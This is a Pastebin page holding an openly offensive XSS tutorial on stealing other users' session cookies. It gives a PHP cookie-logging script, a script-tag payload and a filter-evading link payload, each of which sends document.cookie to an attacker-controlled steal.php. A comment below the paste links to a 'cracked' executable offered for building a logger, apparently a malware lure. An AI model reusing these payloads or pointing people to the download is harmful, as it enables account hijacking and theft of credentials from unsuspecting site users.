API tools faq
paste
Advertisement
zaitsev15

How To Steal A Cookie From A System

zaitsev15
Jun 21st, 2013
1,817
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.42 KB | None | 0 0
raw download clone embed print report
  1. Cookiestealing is one of the most fundamental aspects of XSS (cross site
  2. scripting).
  3. Why is the cookie so important? Well, first you should see exactly what sort of
  4. information is stored in a cookie. Go to a website that requires a login, and
  5. after
  6. logging in erase everything in your address bar and type this line of code:
  7.  
  8. Code:
  9. jalert(document.cookie)After you press enter, you should see a pop-up window with
  10. some information in it
  11. (that is, if this site uses cookies). This is the data that is stored in your
  12. cookie. Here s an
  13.  
  14. example of what might be in your cookie:
  15.  
  16. Code:
  17. username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie.
  18. If any sort of vulnerability was found that
  19. allowed for someone to view other people s cookies, every user account is possibly
  20.  
  21. compromised. You ll be hard-pressed to find a site with cookies like these.
  22.  
  23.  
  24. However, it
  25. is very common (unfortunately) to find sites with hashes of passwords within the
  26. cookie.
  27. The reason that this is unfortunate is because hashes can be cracked, and
  28. oftentimes
  29. just knowing the hash is enough.
  30.  
  31. Now you know why cookies are important; they usually have important information
  32. about the
  33. user in them. But how would we go about getting or changing other users cookies?
  34.  
  35. This is
  36. the process of cookiestealing.
  37.  
  38. Cookiestealing is a two-part process. You need to have a script to accept the
  39. cookie, and
  40. you need to have a way of sending the cookie to your script. Writing the script to
  41. accept
  42. the cookie is the easy part, whereas finding a way to send it to your script is
  43. the hard
  44. part. I ll show you an example of a pHp script that accepts cookies:
  45.  
  46.  
  47. Code:
  48. <?php
  49. $cookie = $_GET['cookie'];
  50. $log = fopen( log.txt , a );
  51.  
  52.  
  53.  
  54. fwrite($log, $cookie . \n );
  55.  
  56.  
  57.  
  58. fclose($log);
  59. ?>And there you have it, a simple cookiestealer. The way this script works is that
  60. it accepts
  61. the cookie when it is passed as a variable, in this case cookie in the URL, and
  62.  
  63.  
  64. then
  65. saves it to a file called log.txt . For example:
  66.  
  67.  
  68.  
  69. Code:
  70. http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we
  71. just wrote, ? lets the script know that we are
  72. going to pass some variables to it, and after that we can set cookie equal to
  73. whatever
  74.  
  75.  
  76.  
  77.  
  78. we want, but what we want to do is set cookie equal to the cookie from the site.
  79. This
  80. is the second and harder part of the cookiestealer.
  81. Most websites apply some sort of filter to input, so that you can t directly
  82.  
  83.  
  84. insert your
  85. own code. XSS deals with finding exploits within filters, allowing you to put your
  86. own
  87. code into a website. This might sound difficult, and in most cases it s not easy,
  88.  
  89. but
  90. it can be very simple.
  91.  
  92. Any website that allows you to post text potentially allows you to insert your own
  93. code
  94. into the website. Some examples of these types of sites are forums, guestbooks,
  95. any site
  96. with a member profile , etc. And any of these sites that have users who log in
  97.  
  98.  
  99.  
  100. also
  101. probably use cookies. Now you know what sort of sites might be vulnerable to
  102. cookiestealing.
  103. Let s assume that we have a website that someone made. This website has user login
  104.  
  105. capability as well as a guestbook. And let s also assume that this website doesn t
  106.  
  107.  
  108.  
  109. have
  110. any kind of filtering on what can be put into the guestbook. This means that you
  111. can
  112. put HTML and Javascript directly into your post in the guestbook. I ll give you an
  114. example of some code that we could put into a guestbook post that would send the
  115. users
  116.  
  117. cookie to out script:
  118. Code:
  119. <script>
  120. document.location = http://yoursite.com/steal.php?cookie= + document.cookie;
  121.  
  122.  
  123.  
  124. </script>Now whenever someone views the page that you posted this on, they will be
  125. redirected to
  126. your script with their cookie from this site in the URL. If you were to look at
  127. log.txt
  128. now, you d see the cookies of whoever looked at that page.
  129.  
  130. But cookiestealing is never that easy. Let s assume now that the administrator of
  131.  
  132. this
  133. site got smart, and decided to filter out script tags. Now you code doesn t work,
  134.  
  135. so
  136. we have to try and evade the filter. In this instance, it s easy enough:
  137.  
  138. Code:
  139. <a href= jvoid(document.location= http://yoursite.com/steal.php?cookie= +
  140.  
  141.  
  142.  
  143. document.cookie) >Click Me</a>In this case, when the user clicks on the link they
  144.  
  145.  
  146. will be sent to your stealer with their
  147. cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how
  148. to get
  149. around filters.
Advertisement
Comments
  • Avalon420
    Avalon420
    55 days
    # text 0.10 KB | 0 0
    view report reply
    1. Make your own logger with this app https://github.com/Venom0248/Menu/raw/main/CrackedRevenant_1.exe
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!